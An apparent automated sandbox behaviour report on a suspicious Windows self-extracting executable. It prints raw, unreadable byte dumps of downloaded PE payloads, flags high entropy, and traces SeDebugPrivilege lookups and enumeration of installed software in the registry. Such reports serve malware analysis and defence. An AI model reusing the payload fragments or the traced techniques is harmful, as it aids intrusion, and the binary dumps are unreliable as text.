resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6ҕ7¹6ғ7¹6Ҕ7¹6ґ7¹6¹‘6 ¹6Ҙ7 ¹6Òo6¹6Ғ7¹6Rich¹6PEd†øÄ®ð" | ‚@ ð » `Á <¢´ðäæàà šT(‘ .text€{| `.rdataÈ"$€@@.dataÀ¤@À.pdataà¨@@.rsrcððè®@@.reloc à – @BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»W€I;ÂEGËE…ÉxGH…Òt"L+ÒL+ÁIH…ÀtAŠ„Àt ˆHÿÁHƒêuäH…ÒHAÿHEÁH÷ÚEÉA÷ÑAáz€ÆëH…ÒtÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌE3ÉL‹ÒM‹ØH‹ÑA¸W€IBÿH=þÿÿEGÈE…Éx5I‹ÊH‹ÂM…Òt€8t HÿÀHƒéuòH‹ÁH÷ØEÉA÷ÑE#ÈH…ÉtM‹ÂL+ÁëE3ÀE…ÉxXI‹ÊII+Èt.H‹ÁMˆþÿÿI+ÂLÈL+ÚM…ÉtAŠ„ÀtˆIÿÉHÿÂHƒéuåH…ÉHBÿHEÂH÷ÙEÉA÷ÑAáz€ÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌL‰D$L‰L$ SVWHƒì 3ÿHBÿH=þÿÿH‹ñ¹W€Gù…ÿx;HZÿH‹ÎH‹ÓLL$X3ÿHÿ˜„D…ÀxH˜H;Ãwu@ˆ<3ë@ˆ<3¿z€ëH…ÒtÆ‹ÇHƒÄ _^[ÃÌÌÌÌÌÌÌH‰\$H‰l$VWAVHì€H‹ ®H3ÄH‰D$pL‹ñfÇD$l3íH …‹ý‰l$hHÿ€DH‹ØH…À„šHð„H‹ÈHÿ.€DH‹ðH…ÀtmHD$`A‰.H‰D$PDE ‰l$HHL$h‰l$@}‰l$8A¹ ‰l$0²‰l$(‰l$ Hÿñ~D…Àt$H‹T$`M‹Æ3ÉH‹ÆÿµƒH‹L$`Hÿ¡~DH‹ËHÿÊD‹ÇH‹L$pH3Ìè¦qLœ$€I‹[(I‹k0I‹ãA^_^ÃÌÌÌÌÌÌÌÌÌÌH‹ÄH‰XH‰pH‰xL‰p UHh¡HìH‹ö¬H3ÄH‰EG‹-®E3öD‰u?fÇECD‰u'A^;Ã…’HM'è‡þÿÿ…À…hHÿŒ€DH‹ÈLE/SHÿæ}D…À„WH‹M/HE+E3ÉH‰D$ E3À‹ÓHÿ•}D…À…HÿY~Dƒøz…ë‹U+3ÉHÿ€DH‹øH…À„ÎD‹M+HE+H‹M/L‹Ç‹ÓH‰D$ Hÿ9}D…À„•HE7A¹ H‰D$PHM?D‰t$HA¸ D‰t$@ŠÓD‰t$8D‰t$0D‰t$(D‰t$ Hÿ4}D…ÀtLA‹öD97v4»H‹U7‹ÎHÉH‹LÏHÿ}D…Àuó;7rÜë ‰ά‰]'H‹M7Hÿ¼|DH‹ÏHÿÕ}DH‹M/Hÿ}D‹E'ë‹ ‘¬»‹E'…ÀEˉ ~¬H‹MGH3Ìè–oLœ$I‹[I‹sI‹{ M‹s(I‹ã]ÃÌÌÌÌÌÌÌÌÌH‰\$WHì0H‹ôªH3ÄH‰„$ I‹ùI‹ÀH‹Ùêt'ƒúuIÀÃ÷ÿÿIƒøwH‹ÐHÿôDëh3ÀëiHÿ €DH‹ÐH‹Ëèú6H‹ ûÈLD$ A¹ÆD$ ‹×Hÿ¢DLD$ º?H‹ËHÿ±DƒÉÿHÿ’D¸H‹Œ$ H3Ìè nH‹œ$HHÄ0_ÃÌÌÌÌÌÌÌH‰\$H‰l$H‰t$WHƒì H‹H‹òH‹ù3íë@8+tjHÿþH‹ÎèÌfH…Àuè¾H‹ÎH‰è¹fH…ÀuH‹û€?tHÿÇH‹ÎÿžèœfH…ÀtæHcÅHÀ8tÆHÿÀH‹\$0H‹l$8H‹t$@HƒÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH‰\$UVWATAUAVAWH¬$úÿÿHìpH‹^©H3ÄH‰…`L‹ñHEPM‹ÖHMPL+ÐM‹ùE3íM‹àºH‚úþÿH…ÀtAŠ „Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(€}P"u H#€HEQë H€HEPHL$0H‰D$0è»þÿÿH‹|$0HƒËÿH‹ðH…ÿtlH‹ÃHÿÀD8,u÷HƒørZŠG±\<:u8Ot8uH:ÁuDHD$@L‹ÇL+ÀHL$@ºH‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(ëZA¹LY¾HD$@A‹ÑL+ÀHL$@H‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿL‹ÇA‹ÑHEÁHL$@Dˆ(è¤cº.H‹ÏèWeH…À„H ‰\$(ºH‰L$ D‹ËL‹ÀJ~Hÿ¹yDƒø…ÎHL$@Hÿ¯yDƒøÿ„ŒÁè÷Ѓà„~HÄ~H‰t$0HL$0è]ýÿÿH‹ÈH…Àt"D8)H§~H‹D$0HEÁHL$0H‰D$0è3ýÿÿº¹@Hÿ{DH‹ØH…À„ËH‹t$0H=E¨H‹ÏLL$@HV~D8.HEÎE3ÀHÿ•yDL‹ËAlj(¼Lá}HD$@H‰D$(H ~H )~ÇD$ HÿZyD…Àt5ƒ źD8.I‹ÎHEþL‹Çè›öÿÿLD$@ºH‹Ëè‰öÿÿéMƒ%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@H‰D$(L§HEþM‹ÎºH‰|$ H‹Ëè^÷ÿÿéÞE3ÉLD$@º%D‰l$(3ÉÇD$ è¸33À鿺.H‹Ïè@cH…À„šHP}‰\$(H‰T$ D‹ËºL‹ÀJ~Hÿ¢wDƒøukH5ѦH‹ÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDH‹ØH…ÀuE3ɺµE3ÀéNÿÿÿLL$@L‹ÆHWH‹Èè†öÿÿ鿹@‹×HÿêxDH‹ØH…Àt·HL$@HÿwDƒøÿt}¨uyLD$@‹×H…`L+ÀH`H‚þûÿH…ÀtBŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(H…ötmD8.thLÙ{H‹×H`èõÿÿL‹ÆH`H‹×èõÿÿë>H…`L+ðH•`H‡þûÿH…ÀtBŠ2„Àt ˆHÿÂHƒïuáH…ÿHJÿHEÊDˆ)L‹ÃDˆ+H‹ÓH`è›I‰$¸H‹`H3Ìè‡hH‹œ$¸HÄpA_A^A]A\
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELê­¦dà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc0018
1 1 0
section {u'size_of_data': u'0x00078200', u'virtual_address': u'0x0000c000', u'entropy': 7.874275641140964, u'name': u'.rsrc', u'virtual_size': u'0x00079000'} entropy 7.87427564114 description A section with a high entropy has been found
entropy 0.936647173489 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000002c0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

